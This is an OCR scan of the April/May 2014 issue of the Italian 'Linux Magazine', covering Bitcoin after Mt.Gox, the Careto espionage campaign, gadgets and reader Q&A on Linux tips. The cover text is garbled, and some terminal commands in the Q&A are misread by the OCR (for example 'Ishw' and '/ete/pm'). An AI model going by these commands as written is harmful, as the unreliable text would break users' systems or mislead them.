\PRILE/MAGGIO 2014 pro = sui | || 


Il ij 
9 1771592 II | 


209 Pt ge 7 ET sTAMPAIN 3D 
NUOVE TECNICHE DI HACKING 


A I 7 ACCO Inetd: pulizie 
di primavera 
Ottimizza il demone di sistema, 
rimuovendo servizi mangia risorse 
i Ad ognuno — 


Abbiamo analizzato le più insidiose vulnerabilità di sistema 
per scoprire come fanno gli smanettoni a bucare Linux, 
obtiniai e Mac...e a — pieno controllo! 


(il 


MASTER | 
avurme sotmmnserit 815006 


i Economiche 0 
hi-end? Ecco pregi 
e difetti delle 
stampanti 3D di 
ultima generazione 


Solo così blindi il tuo sistema 
e definisci permessi specifici 
per ogni singolo utente 


La pillola blu 
per il tuo Wi-Fil 


Segnale debole & 
e connessione lenta?4 
Ecco le dritte per tirarli st 


Quanto è veloce 

il mio PC? 

La guida per eseguire dei 
benchmark affidabili e scoprire 
i colli di bottiglia 

Come fruite lab più famosa moneta virtuale? Cosa si 


può comprare? Quali sono i pericoli in agguato? Ecco la verità 


Arduino e i suoi cloni 
Ecco i server web che stanno 
nel palmo di una mano 


Installa la distro che trasforma qualsiasi hard disk in un comodo | | Libera il tabi 
con il root » 


TV in streaming 
su smartphone & TV . 


disco di rete per accedere da remoto a tutti i tuoi documenti 


Pagina mancante 
(pubblicità) 


Pagina mancante 
(pubblicità) 


LINUX Magazine 


Anno XVI - 03 (153) - AprMag 2014 - Periodicità Bimestrale 
Reg. Trib. di CS n.ro 625 del 23 Febbraio 1999 
Codice ISSN 1592- 8152 
E-mail: linuxmag@edmaster.it - Internet: www.linux-magazine.it 


Direttore Editoriale: Massimo Mattone 
Direttore Responsabile: Massimo Mattone 
Responsabile Editoriale: Gianmarco Bruni 


Redazione: Domenico Pingitore 
Collaboratori: M. Alamanni, S. Caioli, V. Cosentino, 
M, Petrecca, G. Racciu, L. Tringali 


Segreteria di Redazione: Rossana Scarcelli 
Consulenza Redazionale: SET s.r.1./ G. Forlino 


REALIZZAZIONE GRAFICA Cromatika s.r.. 
Art Director: Fabio Marra 
Responsabile grafico di Progetto: Leonardo Cocerio 
Area Tecnica: Giancarlo Sicilia (Responsabile). Dario Mazzei 
Illustrazioni: Tonino Intierì, Arturo Barbuto 
Grafica: Francesco Cospite 


Concessionaria per la pubblicità: MASTER ADVERTISING s.r.]. 
Viale Andrea Doria, 17 - 20124 Milano - Tel. 02.83121211 - Fax 02.83121207 
email: advertising@edmaster.it 


EDITORE Edizioni Master S.p.A. 
Sede di Rende: via Bartolomeo Diaz, 13 - 87036 Rende (CS) 
Presidente e Amministratore Delegato: Massimo Sesti 


Abbonamenti e arretrati: Costo abbonamento per l’Italia versione DVD ROM 
(6 numeri) € 25,00 sconto 30% sul prezzo di copertina di € 35,94; DVD ROM (12 numeri) 
€ 50,00 sconto 30% sul prezzo di copertina di € 71,88; versione DVD doppio (6 numeri) 
€ 30,00 sconto 28% sul prezzo di copertina di € 41,94; DVD doppio (12 numerî) € 60,00 
sconto 28% sul prezzo di copertina di € 83,88, Offerta valida fino al 31/05/2014. . 
Costo arretrati (a copia): il doppio del prezzo di copertina + € 6,10 spese (spedizione 
Con corriere). (Prima di inviare i pagamenti, verificare la disponibilità delle copie arretrate 
inviando una e-mail all'indirizzo arretrati@edmaster.it). La richiesta contenente i Vs. dati 
anagrafici e il nome della rivista, dovrà essere inviata via fax al num. 199.50.00.05*, 
Oppure via posta a: 
EDIZIONI MASTER S.p.A. - Viale Andrea Doria, 17 - 20124 Milano 

dopo avere effettuato il pagamento, secondo le modalità di seguito elencate: 

- assegno bancario non trasferibile (da inviarsi in busta chiusa insieme alla richiesta); 

- carta di credito, circuito Visa, Cartasi, o Eurocard/Mastercard, (inviando la Vs. 
autorizzazione, Il numero di carta di credito, ia data di scadenza, l'intestatario della carta 
eil codice CVV2, cioè le ultime 3 cifre del codice numerico riportato sul retro della carta). 

- bonifico bancario intestato a Edizioni Master S.p.A. c/o BANCA DI CREDITO 

COOPERATIVO DI CARUGATE E INZAGO S.C. 

IBAN IT47R0845333200000000066000 (inviando copia della distinta con la richiesta). 


SI PREGA DI UTILIZZARE IL MODULO RICHIESTA ABBONAMENTO 
POSTO NELLE PAGINE INTERNE DELLA RIVISTA. 

L'abbonamento verrà attivato sul primo numero utile. successivo alla data della richiesta 
Sostituzioni: qualora nei prodotti fossero rinvenuti difetti o imperfezioni che ne limitassero 
la fruizione da parte dell'utente, è prevista la sostituzione gratuita, previo invio del materiale 

difettato. La sostituzione sarà effettuata se il problema sarà riscontrato e segnalato entro 
e non oltre 10 giorni dalla data effettiva di acquisto in edicola e nei punti vendita autorizzati, 

facendo fede ll timbro postale di restituzione del materiale. 
Inviare il supporto digitale difettoso in busta chiusa a: 
Edizioni Master - Servizio Clienti - Viale Andrea Doria, 17 - 20124 Milano 


SERVIZIO CLIENTI 
@ servizioclienti@edmaster.it 


Ep 199.50.00.05° sempre n tuvire 


È 199.50.50,51 ‘1 Limes al venerdi ? 


Assistenza tecnica: linuxmag@edmaster.it 
Stampa: GRAFICA VENETA S.p.A. - Via Malcanton, 2 - 35010 Trebaseleghe (PD). 
Duplicazione DVD: EcoDisk S.r., - Via dell'Aprica, 16 - 20158 Milano 
Distributore esclusivo per l'Italia: 
m-dis distribuzione media S.p.A. 
via Cazzaniga, 19 20132 Milano tel:02/25.82.1 


Finito di stampare: Marzo 2014 
Nessuna parte della rivista può essere in alcun modo riprodotta senza autorizzazione scritta della Edizioni 
Master, Manascritti è foto originali, anche se non pubblicati, non si restituiscono. La Edizioni Master non si 
assume alcuna responsabilità per eventuali errori od omissioni di qualunque tipo. Nomi e marchi protetti 
sono citati senza indicare i relativi brevetti. La Edizioni Master non si assume alcuna responsabilità per danni 
derivanti da virus informatici non riccnosciuti dagli antivirus ufficiali all'atto della masterizzazione de! supporto, 
né per aventuali danni diretti o Indireîti causati dall'errata instaliazione o dall'utilizzo dei supporti informatici 
allegati. “Rispettare l'uomo e l’ambiente In cul esso vive e lavora è una parte di tutto ciò che facciamo 
e di ogni decisione che prendiamo per assicurare che le nostre operazioni siano basate sul continuo 
miglioramento delle performance ambientali e sulla prevenzione dell'inquinamento” 


conti E CD; 1 ‘91.EMAS 


EDIZIONI 
MASTE 


sika, 


C) LINUX Magazine - Anno XVI - 03 (153) - Apr/Mag 2014 


Bitcoin è il futuro: ad alcuni fa paura. 


La piattaforma che sta rivoluzio- 
nando il concetto stesso di valuta 
è al centro di una tempesta di 
critiche: bitcoin è un “oggetto tec- 
nologico” intrinsecamente legato 
all'informatica e alla crittografia. 
Come tale può essere difficile 
comprendere i suoi meccanismi di 
base, almeno per l’utente comu- 
ne. | soggetti finanziari tradizionali 
più aggiornati, al contrario, temo- 
no solo le eccessive fluttuazioni 
dovute probabilmente alla giovane 
età della piattaforma. Esempla- 

re il caso di Mt.Gox, l'azienda 
giapponese che, a metà febbraio, 
ha causato un vero tracollo della 
valutazione dei bitcoin, causa dello 
“smarrimento” di 850.000 bitcoin 
di proprietà di ignari clienti. Il buco 
creato nelle case dell’azienda 

si aggira sul mezzo miliardo di 
dollari, cosa che porterà al proba- 
bile fallimento della società. Ma 
questo è “il meno”. Quello che 

ci sta a cuore è comprendere il 
destino dei bitcoin che, almeno a 
breve termine, è fatalmente legato 
all’esito della vicenda Mt.Gox. Si 
ricomincia a parlare di regolamen- 
tazione della cripto valuta, anche 
per tentare di offrire qualche ga- 
ranzia a chi decide di investire nel 
mercato. Ma è indubbio che, vista 
la natura priva di banche centrali 
e organismi di controllo propria 
del bitcoin, qualsiasi tentativo di 
incidere in modo significativo è 
destinato a essere frustrato: per 

i bitcoin vale un po' quanto da 
sempre vale per Internet, ovvero la 
natura transnazionale e distribuita 
rende l'approccio "vecchio stile" 
di legislazioni che nel migliore dei 
casi sono continentali poco effica- 
ce. La situazione si presta co- 
munque a essere ottimo banco di 
prova per quanto riguarda le reali 
possibilità future della criptovaluta. 


Sebbene siano lontani itempiin.—— 
cui un bitcoin valeva oltre 1.000 
dollari, che gli altri siti discambio 
non hanno subito danni eclatanti. 
da quanto successo: la valuta- 
zione del bitcoin era crollata su. — 
Mt.Gox prima della chiusura ma, 
dopo qualche giorno, sugli altri siti ; ; 
si è ben stabilizzata al di sopra - = 
500 dollari. La temuta catastrofe. 
si può dunque dire scongiurata. 
Di sicuro c'è una flessione signifi- 
cativa che nel mese di febbraio è 
costata circa 300 dollari, passando 
da oltre 850 per un singolo bitcoin | 
ad una valutazione attorno ai 560. 
euro. Numeri negativi ma non da 
crollo verticale: c'è stato un au- 
mento delle contrattazioni, segno 
che qualcuno ha preferito uscire. 
dal mercato rapidamente, ma non. 
si sono registrati problemi gravi. Il © 
vero punto di domanda riguarda 
la solidità degli operatori di questo. 
mercato. Il management Mt.Gox, © 
pochi giorni prima di chiudere. — 
baracca, era ancora convinto di 
avere un futuro roseo davanti a sé, 
segno che evidentemente neppure. 
internamente era venuto del tutto a 
galla il grave problema relativo alla. . 
cosiddetta "malleabilità" delle pro- 
cedure di scambio che ha causato 
un buco da 850mila bitcoin. Ora, 
chi è stato danneggiato da quanto 
successo chiederà conto in tribu- 
nale delle scelte operate dai vertici. i 
di Mt.Gox: quale che sia l' esito 
di questa class action, servirà 
senz'altro a chiarire meglio l' am Leg 
bito nel quale si muove il mercato 
dei bitcoin, anche se Props si 
te non basterà per INCIDE, (È 
soldi svaniti. 
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Lavorare con Linux conviene 


Paghe superiori alla media e ottimi bonus: il Pinguino dà soddisfazioni 


MI Dice e Linux Foundation hanno rilasciato 
il loro tradizionale rapporto annuale sul 
mondo del lavoro e dei lavoratori Linux e il 
messaggio veicolato nel 2014 è lo stesso del 
recente passato: i professionisti specializzati 
nelle tecnologie del Pinguino sono molto 
ricercati, ben pagati e soddisfatti del proprio 
lavoro quotidiano. “L'esplosiva domanda di 
talenti Linux si sta. intensificando”, dice il 
Linux Jobs Report del 2014, secondo i dati 
forniti da un migliaio manager delle assun- 
zioni (in italia si parlerebbe di “responsabili 
del personale") interpellati per mettere 
assieme il rapporto. Più del 90 per cento 

dei suddetti manager pianifica dunque di 
assumere professionisti Linux nel corso dei 
prossimi sei mesi, e nel 46 per cento dei casi 
si tratta di ritmi di assunzioni superiori del 

3 per cento rispetto all'anno preso in esame 
nel rapporto precedente (2012). Per quanto 
riguarda le aree di competenza specifiche 


all'interno dell'ecosistema Linux, gliammi- 
nistratori di sistema continuano a rappre- 
sentare il pezzo forte delle professionalità 
più richieste {58 per cento] seguite dagli 
sviluppatori di applicazioni (45 per cento] 

e dagli ingegneri di sistema/architetturati 
(45 percento). professionisti del Pinguino 
sono sempre più richiesti e vengono pagati 
con salari superiori alta media dell'industria 
hi-tech, dice il rapporto Dice/Linux Founda- 
tion, ricevendo per di più bonus medi-di oltre 
10mila dollari. E sono anche più contenti del 
loro lavoro, i professionisti Linux, visto.chei 
progetti su cui lavorano - sostiene sempre .il 
rapporto - sono interessanti, sono quanto: di 
più hi-tech" si possa desiderare e permet- 
tono loro di avere notevoli opportunità dì 
carriera nel corso degli anni futuri: 


Dor infarmaziazi: 
FELIMONMAZIONN 


www.dice.com 


Google Glass: primi consigli per l’uso 


Prime istruzioni d'utilizzo da Google per gli utenti dei suoi “occhiali” 


MI Una bozza di codice di 
condotta per i possessori di 
Google Glass, una serie di cose 
da fare e da evitare: Mountain 
View vuole in questo modo 
rendere la loro prova il più 
fluida possibile. Non si tratta 
di consigli a sfondo tecnologico 
ma di suggerimenti di utilizzo, 
in modo tale da non straniare 
la società che si trova a dover 
considerare il nuovo gadget ed 
i suoi possibili scenari d'uso. 
Scrivendo agli explorer, i primi 
utenti degli occhiali smart pro- 
dotti da Mountain View per por- 
tare le possibilità offerte dalla 
connettività mobile davanti agli 
occhi delle persone, Google ha 
cercato di consigliare loro linee 
guida per una nuova buona 
educazione. Sia per i presun- 

ti problemi di mal di testa 
legati all'uso prolungato che 
alla stranezza di vedere una 


persona indossarli costante- 
mente, Mountain View parte dal 
raccomandarsi di non impie- 
garli tutto il giorno ma solo per 
specifici periodi di tempo e con 
uno scopo. Secondo, se ce fos- 
se bisogno, Google chiede che 


non vengano utilizzati mentre 
si fanno sport particolarmente 
movimentati; terzo, che chi 

li indossa si possa aspettare 
domande indiscrete sul loro 
funzionamento (sarà necessa- 
rio capire quando è il momento 
per indossarli e quando è op- 


portuno toglierli); quarto, che 
si abbia sempre rispetto per le 
regole legate agli smartphone 
(spegnere entrambi quando 
richiesto dalla situazione) e per 
chi li circonda, non dimentican- 
do che è sempre meglio essere 
educati. “Con nuove tecnologie 
arrivano nuove domande ed 

i nostri explorer ci aiutano a 
trovare una risposta”, scrive 
Google. | pionieri dei Glass, 
d'altronde, oltre ad essere beta 
tester della nuova tecnologia, 
si trovano anche ad affrontare 

i dubbi delle autorità e della so- 
cietà civile: i primi dubbi hanno 
riguardato la privacy, ma sono 
sorti problemi per gli utenti 
degli occhiali anche alla guida 
di un'automobile e al cinema, 
riassumendo: moderazione. 


Per informazioni: 
www.google.com/glass/start/ 


Piccoli Sistemi Operativi crescono 


Sailfish e Firefox OS non mollano: le novità al Mobile World Congress di Barcellona 


BI Sailfish e Firefox OS stanno 
muovendo i primi passi nell’af- 
follato panorama degli smart- 
phone. | finlandesi ex-Nokia si 
accingono a distribuire la prima 
versione commerciale del pro- 
prio sistema, tentando anche di 
colonizzare gli smartphone An- 
droid già in circolazione, mentre 
gli uomini della Foundation 
sono alle prese con la seconda 
generazione di hardware che 
dovrebbe permettere il salto di 
qualità necessario a prendere 
posizione in modo stabile nella 
fascia media del mercato. Dal 
loro quartier generale scandi- 
navo, gli uomini di Jolla hanno 
fatto sapere che entro l'inizio di 
marzo il quarto aggiornamento 


della versione 1.0 del loro siste- 
ma operativo sarà rilasciata al 
pubblico: si tratterà di un vero e 
proprio spartiacque, visto che in 
concomitanza con questo evento 
dovrebbe essere garantita la 
compatibilità del sistema ope- 
rativo con alcuni dei dispositivi 
più venduti del mondo Android, 
compresi Samsung Galaxy, Sony 
Xperia e Nexus. In questo modo 
chi volesse provare Sailfish 0S 
non dovrà fare altro che scari- 
carlo e installarlo: una prospet- 
tiva probabilmente riservata a 
una nicchia di utenti, ma si tratta 
di un movimento in crescita che 
Jolla spera di cavalcare. Diverso 
il cammino che attende Firefox 
OS: fino a questo punto il siste- 


ma operativo mobile di Mozilla 
è rimasto confinato su appa- 
recchi di fascia bassa. Un tablet 
pronto per il mercato forse è 
ancora presto per vederlo, ma 
terminali con maggiore potenza 
e capacità più evolute di quelli 
visti fino ad ora sarebbero un 
passo in avanti. Un buon inizio 
potrebbe essere il Geeksphone 
Revolution, terminale capace 

di far girare indifferentemente 
Android e Firefox OS: hardware 
da fascia medio-alta, prezzo 
contenuto, la possibilità di 
optare per il vasto ecosistema 
Android se Firefox OS non fosse 
abbastanza un paracadute che 
potrebbe convincere più di qual- 
cuno a tentare questa strada. 


Quando la rete spia i governi 


Kaspersky ha individuato un network di spionaggio altamente sofisticato 


MI :Netsempre più affollato bestiario dei malware 


APT [Advanced Persistent Threat) entra Careto 0 


“The Mask", sofisticatissimo attacco contro obiet- 


tividi alto profilo individuato da Kaspersky Labs 
eattivo sin dal 2007. | “mandanti” non sono noti 
mala security-enterprise mosco- 

vita identifica le possibilti‘origini 

spagnole della minaccia. Di certo ha 

tutta l'aria di un'operazione gestita 

per:conto di un governo nazionale. 

Careto è una delle minacce più 

complesse mai identificate: un 

“pacchetto” tutto compreso che 

include un:malware estremamen- 

te sofisticato per Windows (32 e 

64-bit}, Mac 0S X, Linux:e forse 

versioni mobile (Android/i0S), un 

rootkit.e un bootkit per garantirsi 

ta:persistenza sulla macchina in 

caso di pulizia antivirus. Il software cyber-spione 
arriva sotto forma di email di phishing altamente 
personalizzata:sui bersagli da colpire, si camuffa 
come link legittimi a quotidiani online popolari ed 
&in grado di carpire ogni genere di informazioni 


dai sistemi infetti comprese chiavi crittografiche, 
tasti premuti, conversazioni Skype e molto altro 
ancora. Gli analisti di Kaspersy hanno individuato 
380 vittime “uniche” di Careto su 1.000 diversi IP, 
indirizzi a cui corrispondono agenzie governative, 
ambasciate, istituti di ricerca, attivisti, 
società energetiche o di altre indu- 
strie sensibili, dislocati in 31 diversi 
paesi (Europa, Africa, Sudamerica). 
Un'operazione così sofisticata era 
evidentemente pensata per passare 
inosservata, e infatti Kaspersky ha 
rilevato la cessazione delle attività in 
anticipo sulla pubblicazione dell'ana- 
lisi approfondita della minaccia, Gli 
autori di Careto erano impegnati a 
monitorare l'infrastruttura di con- 
trollo, spiegano gli analisti, e devono 
quindi essersi accorti del fatto che 
qualcuno era inascolto prima di eliminare le tracce 
dei file di log e interrompere le comunicazioni. 


Per informazioni 


www.edmaster.it/url/2956 


> Rie 
in continua- | 
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Linux gadget e prodotti 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 


PER "VOLARE" IN INTERNET 
TP-LINK ARCHER D7 
Archer D7 è un modem router wireless dual band Gigabit ADSL2+ 
ultraveloce. Utilizza il nuovo standard Wi-Fi 802.11ac che è tre 
volte più veloce del Wireless N, permettendo di visualizzare video 
HD in streaming, divertirsi con il gaming online e navigare in 
Internet senza interruzioni. Vanta due porte USB multifunzione in 
standard 2.0 alle quali si possono 
collegare diverse periferiche 
come hard disk, fotocamere, 
videocamere e stampanti ren- 
dendoli disponibili e condivisibili 
nella rete locale grazie alla fun- 
zione FTP. Grazie alle tre an- 
tenne esterne (che si 
aggiungono alle 
tre interne), si 
assicura una 
migliore co- 
pertura del segnale 
wireless. 

Per informazioni: 


www.tplink.it 


TANTO BENESSERE IN UN "BOTTONE" 


MISIFIT WEARABLES SHINE 
Visto che andiamo incontro alla bella stagione, non possia- 
mo non consigliarvi l'acquisto di questo utilissimo appa- 
recchio misuratore per il fitness. Una volta infilato in tasca, 
inizierà a misurare battiti, passi ecc da trasferire successiva- 
mente sull'iPhone. Per farlo basterà appoggiarlo sul display 
del telefonino senza utilizzare alcun cavo. Unica cosa 
necessaria è scaricare l'apposita App. Il dispositivo è dispo- 
nibile al momento solo negli USA, ma presto sarà possibile 
acquistarlo anche direttamente in Europa. 
Per informazioni: 


www. misfitwearables. 
com 
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VELOCE E PIENO DI ENERGIA! 


TECHLY HUB USB 3.0 SUPER SPEED 4 PORTE 


Questo Hub è dotato di alimentazione elettrica interna per 
consentire di amplificare il segnale affinché questo non 
subisca attenuazioni in nessuna delle 4 porte USB di cui è 
dotato. Il funzionamento di questo dispositivo è molto sem- 
plice: e permette di trasferire file di grandi dimensioni quali 
film, musica, immagini in pochissimo tempo. Con questo 
dispositivo sarà inoltre possibile ricaricare telefoni, foto- 
camere e player Mp3. 
L'hub racchiuso in 
un case bian- 
co si presenta 
resistente e ben 
costruito. 
Techly 
Per informazioni: 
www.manhattan- 


shop.it 
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UN BRACCIALETTO MOLTO SMART 


LG LIFEBAND TOUCH 
Apparentemente sembra un normale bracciale per il fitness come 
ce ne sono tanti in commercio, ma in realtà Lifeband Touch offre 
una serie di funzioni che non si limitano alle classiche contapassi 
e misuratore di distanza. Oltre a visualizzare 
l'ora come un normale orologio, colle- 
gato via bluetooth ad un qualsiasi 
smartphone, permette di ricevere 
telefonate o di comandare la 
riproduzione di brani musicali. 
Utilissimo dunque nella sta- 
gione primaverile per tutti 
coloro che amano gli 
sport all'aria aperta. 
Per informazioni: 


www.ig.com 


Il suo potente processore Quad Core 
A7 permette al nuovo arrivato in casa 
Archos di raggiungere una velocità 
sorprendente in navigazione, streaming 
e download. Tra le sue caratteristiche 


connettività 4G LTE, case in allumi- 
nio dello spessore di appena 9 mm e 


accesso completo al Google Play Store. 


Come sistema operativo preinstallato, 
troviamo l'ottimo Android Jelly Bean. 
Chi deve acquistare un nuovo tablet 
può prendere in seria considerazione 


principali: schermo da 8 pollici ad alta 
risoluzione, fotocamere frontale e po- 
steriore, Bluetooth Smart Technology, 


l’Archos 80 Helium 4G. 


} ) { 
nto eltih 


Questo gadget USB a forma di busta da lettera si collega al PC e 
ogni volta che arriverà una email ci manderà un segnale illuminan- 
dosi. Sarà possibile sincronizzare più caselle di posta elettronica e 
anche diversi social network, i messaggi potranno essere differenziati 
da 9 differenti colori così da poterne usare uno per ogni diverso ser- 
vizio. Inoltre, a ogni colore potrà essere aggiunto un diverso segnale 
sonoro, ce ne sono dieci a disposizione. Un gadget simpatico, utile e 
bello da posizione sulla scrivania. 


LA POLAROID DEL 2014 


LG POCKET. PHOTO 2.0 
La stampante tascabile di LG ti permette di stampare foto digitali 
nel formato 5.1 X 7.1 praticamente ovunque. Basterà collegarta allo 
smartphone via bluetooth o NFC, scaricare l'apposita applicazione 
per Android, i0S o Windows Phone e le immagini verranno stam- 
pate in pochissimi secondi. 


Per informazioni: WW On 


La Flash drive Connect Wireless di Sandisk, si è da 
poco arricchita di una nuova versione, quella da 
64GB. Questa speciale pendrive si può collegare al 
PC via USB ed è dotata di connessione Wireless per 
essere utilizzata con altri dispositivi come memoria 
esterna, ad esempio per uno smartphone. Il prezzo non 
è tra i più abbordabili, ma la qualità è sicuramente tra le 
migliori. 
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Applicazioni 


ac 0S X su 
aNU/Linux 


00 , Gentile Redazione, sono un 
i utente Mac OS X recentemen- 
te migrato a GNU/Linux. Il nuovo 
sistema operativo mi piace molto, 
ma avrei necessità di eseguire 
alcune applicazioni sviluppate per il 
sistema operativo Apple su GNU/Li- 
nux. Esiste un emulatore o qualco- 
sa di simile? 


Mario 


Caro Mario, un'applicazione che po- 
trebbe fare al caso tuo esiste e si chiama 
Darling (4ttp:/darling.dolezel.info). In 
pratica, funziona in modo molto simile 
a Wine per quanto riguarda eseguire 

le applicazioni Windows sotto GNU/ 
Linux. Darling, in sintesi, parsa i file 
eseguibili del kernel Darwin (il cuore 

di Mac OS X), li carica in memoria e 

li esegue. Tutto ciò è possibile grazie 
alla mappatura delle funzioni Mac OS 
X in equivalenti GNU/Linux. Il wrap 
delle funzioni native permette così di 
risolvere le incompatibilità con le inter- 
facce ABI e mette a disposizione delle 
reimplementazioni di altre API native. 
Darling dovrebbe quindi essere in grado 
di risolvere i tuoi problemi e, in futuro, 
potrebbe permettere di eseguire su GNU/ 
Linux anche applicazioni compilate 

per iOS. Il software è rilasciato sotto 
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licenza libera GNU GPL 3, ma include 
anche alcune parti rilasciate sotto licenza 
Apple Public Software License. Per 
provare questo software, attualmente, si 
può solo utilizzare il relativo repository 
Git. Il comando da eseguire per scari- 
care il software è il seguente: git clone 
- -recursive git://github.com/LubosD/ 
darling.git. Altre informazioni utili alla 
compilazione sono reperibili all'indirizzo 
http://darling.dolezel.info/en/Build. 


- Gonvertire MKV 
in MP4 


Salve. Vorrei riprodurre i file video 

in formato MKV anche sul mio 
telefonino Android. Ho provato con l'app 
MX Player, ma il mio smartphone non è 
sufficientemente potente per riprodurre il 
filmato fluidamente. C'è un modo per 
convertire un file MKV in un formato più 
idoneo al mio smartphone? Grazie, 
Come distribuzione GNU/Linux utilizzo 
Ubuntu 12.10. 

Antonio 


L'app che hai provato a installare sul tuo telefoni- 
no Android è la più indicata per la riproduzione 
di un filmato in alta definizione con estensione 
MKV. Ciononostante, se il tuo smartphone non 
dispone di risorse hardware sufficientemente 
potenti per visualizzare il filmato, puoi conver- 
tire il file nel formato MPA, cercando di lasciare 
inalterata (per quanto possibile) la qualità audio/ 


Fig. 1 L'interfaccia grafica di Arista 
Transcoder è molto semplice. Dopo aver 
avviato il software, clicchiamo su “Cre- 
ate Conversion” per iniziare un nuovo 
progetto. 


video. Per la conversione sono disponibili diversi 
tool e fra tutti ci sentiamo di consigliarti Arista 
Transcoder (Figura 3). Il software è, ovviamen- 
te, in grado di leggere correttamente i file MKV 
(Matroska), così come gli AVI e decine di altri 
formati. Grazie a numerosi preset, è possibile 
convertire ogni file multimediale utilizzando 

i parametri ideali per il proprio dispositivo 
portatile (che può essere uno smartphone, un 
tablet, un lettore MPA etc). Se la distribuzione in 
uso è Ubuntu, è possibile installare il software 
direttamente dall'Ubuntu Software Center. 

Se, invece, utilizzi una distro differente, puoi 
collegarti alla pagina web www.transcoder.org/ 
downloads ed effettuare il download dell'archi- 
vio .tar.gz contenente l'ultima release disponibile 
(al momento in cui scriviamo la 0.9.7). Dopo 
aver installato Arista Transcoder, dai un'occhiata 
alla pagina www.transcoder.org/presets per veri- 
ficare che sia già disponibile un preset relativo al 
tuo modello di telefonino. In caso contrario non 
disperare: ti bastano pochi secondi per crearne 
uno nuovo, 


Niente 
connessione 
sospensione 
4) Gentile Redazione, sono un 
fé utente Ubuntu ed ho riscon- 
trato un problema con la connes- 
sione a Internet tramite wireless. In 
pratica, dopo la sospensione del 
computer, al successivo riavvio, 
non riesco più a navigare. Cosa 


posso fare? 
Mirko 


assistance PROBLEMI CON LA 
OLOGIA? ECCO LE SOLUZIONI 


echAssistance (www.techassistance.it) è una community di tecnici specializzati sempre a tua disposizione, 

per aiutarti a risolvere problemi di ogni tipo con i dispositivi elettronici che usi quotidianamente! Ecco alcune 
soluzioni ai problemi più frequenti postati dagli utenti. Se, invece, sei tu ad essere in difficoltà e vuoi ottenere aiuto 
immediato, collegati all'home page del servizio ed esponi il problema alla community: un team di esperti è pronto 


a indicarti la soluzione più adatta per risolverlo nel più breve tempo possibile! 


Dentro GNU/ 
Linux da 
Windows 


{0% Salve, da qualche tempo ho 
= installato Ubuntu 12.10 in 


dual boot con Windows 7 Ultimate 
(che uso per alcuni programmi di 
lavoro). Da GNU/Linux riesco a 
leggere senza problemi i dati 
presenti nella partizione di Win- 
dows, ma non riesco a fare il 
contrario. Esiste un metodo per 
accedere da Windows ai dati che 
ho salvato nella partizione di 
Ubuntu? Grazie. 


Luigi : 


Caro Luigi, molti utenti si ritrovano nella 
tua stessa condizione. Per un motivo 0 per 


Fig. 2» Il comando lshw ha individuato 
la scheda Wi-Fi e il relativo modulo del 
kernel 


Caro Mirko, il problema da te riscontrato è 
comune a molti altri utenti. Per trovare una 
soluzione e ripristinare la connessione dopo la 
sospensione del computer, occorre per prima 
cosa individuare qual è il modulo del kernel 
utilizzato per il funzionamento della scheda 
wireless. Per scoprirlo, puoi utilizzare il tool 


l'altro, infatti, c'è chi preferisce creare un 
sistema dual boot con una qualsiasi distro 
GNU/Linux affiancata a Windows. Come 
tu stesso hai notato, Ubuntu (così come 
tutte le altre distribuzioni) non ha problemi 
a leggere e scrivere sulla partizione del si- 
stema operativo di casa Microsoft, in par- 
ticolare perché sia le partizioni NTFS sia 
quelle FAT32 sono pienamente supportate 
dal kernel Linux. Diversamente, Windows 
non è in grado di accedere nativamente a 
partizioni formattate con file system Ext2, 
Ext3 o Ext4 (Figura 2). Tuttavia, esistono 
alcuni software che ti permettono di acce- 
dere (per lo meno in lettura) alla tua parti- 
zione di Ubuntu. Fra i tanti ti consigliamo 
Explore2fs (Wwww.chrysocome.net/explo- 
re2fs), un piccolo e gratuito tool che, dopo 
essere stato installato sul tuo Windows 7 ti 
permette di leggere anche file system Ext4 
(predefinito della distro di Canonical). 
Esistono altri programmi molto simili a 


Ishw (Hardware LiSter, http:/ezix.org/ 
project\wiki/HardwareLiSter). Per installare 

il programma, basta aprire un terminale ed 
eseguire il comando sudo apt-get install 
Ishw. A questo punto, per ottenere tutte le in- 
formazioni necessarie, sempre da terminale, è 
sufficiente eseguire il comando sudo Ishw -C 
network. Il risultato ottenuto (Figura 1) varia, 
ovviamente, in base al computer sul quale si 
esegue il comando. Quello che occorre cercare 
è il driver associato al modello di scheda Wi-Fi 
presente nel PC. Dopo averlo individuato, 
bisogna procedere andando ad inserire gli op- 
portuni valori in un file di configurazione. Più 
precisamente, basta eseguire il comando gksu 
gedit /ete/pm/config.d/unload_modules 

e inserire all'interno del file la riga seguente: 
SUSPEND_MODULES="$SUSPEND 
nome_driver_scheda". La voce nome_dri- 


Explore2fs, alcuni dei quali permettono 
non solo di leggere, ma anche di scrivere 
sulla partizione di GNU/Linux. È il caso 
di Ext3IFS (www.fs-driver.org) che, però, 


i è leggermente più lento in lettura. 


Fig. 3 * Microsoft Windows non monta le 


partizioni Ext2, Ext3 e Ext64. Utilizzando 
l'utility di gestione del disco fisso, infatti, 
la lista delle partizioni è visualizzata cor- 


| rettamente, ma il sistema non è in grado 
: diassegnare un'unità a quelle dedicate a 


GNU/Linux. 


ver_scheda dovrà essere sostituito con quello 
rilevato dal programma Ishw. In questo caso 
specifico, ciò che dovremo scrivere è SU- 
SPEND_MODULES="$SUSPEND_MO- 
DULES bremsmac". Il file potrebbe anche 
non esistere, ma in quel caso basta sempli- 
cemente crearlo. A questo punto, bisogna 
salvare, riavviare e tutto dovrebbe funzionare 
perfettamente. 


Disabilitare 
Gtrl+Alt+Canc 


Ho un computer che condivido 
CON altri utenti, perciò vorrei 
disabilitare la possibilità di riavviare la 
macchina utilizzando la combinazione di 
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tasti Ctrl+Alt+Canc. Come posso fare? 
Michele 


In effetti quella combinazione di tasti, nota 
anche come “il saluto delle tre dita”, può 
creare qualche grana se si sta condividen- 
do un computer. La combinazione di tasti 
Ctrl+Alt+Canc è notoriamente mappata 
con il comando di sistema /sbin/shutdown 
-r now, che causa il riavvio immediato del 
sistema. Ciò che si può fare è rimappare il 


interessa è 


comportamento da eseguire alla pressione di 
questa combinazione di tasti o semplicemente 
disabilitarne l'uso. Il file di sistema da mo- 
dificare, come di consueto con i privilegi di 
amministratore, è /etc/inittab. Il file contiene 
anche molte altre impostazioni che andrebbe- 
ro modificate solo con la massima consape- 
volezza di ciò che si va a fare. La riga che ci 
::ctrlaltdel:/sbin/shutdown -r 
-t 4 now. Se vogliamo solo disabilitare questa 
combinazione di tasti, basta commentare la 


riga facendola iniziare con il carattere speciale 
“#°. In alternativa, possiamo decidere di mo- 
dificare il comando da eseguire, magari sce- 
gliendo un'operazione più innocua, come, ad 
